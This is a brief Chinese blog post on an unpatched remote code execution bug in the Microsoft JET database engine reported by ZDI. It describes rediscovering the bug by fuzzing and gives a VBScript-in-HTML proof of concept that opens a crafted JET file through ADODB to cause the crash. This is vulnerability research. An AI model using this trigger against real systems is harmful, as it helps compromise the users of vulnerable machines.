最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的

有兴趣的朋友移步:
https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine

提供了POC与崩溃文件。

这也提供了一个新思路,可以fuzz数据库文件。 所以,最近在fuzzing 中。而且,好气啊,就跑了几分钟,就把ZDI报这个洞就又跑出来了。(因为微软目前还没补)

至于怎么fuzz的,略过。

下面,我把触发的Poc改成了VB写的~~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<body>

<script type="text/vbscript">

msgbox("123")

Dim conn
Set conn = CreateObject("ADODB.Connection")
'Dim rs
'set rs = ADODB.Recordset
Dim Cnstr

conn.connectionstring = "PROVIDER=Microsoft.Jet.OLEDB.4.0;Data source=group1"

conn.open

</script>
</body>
</html>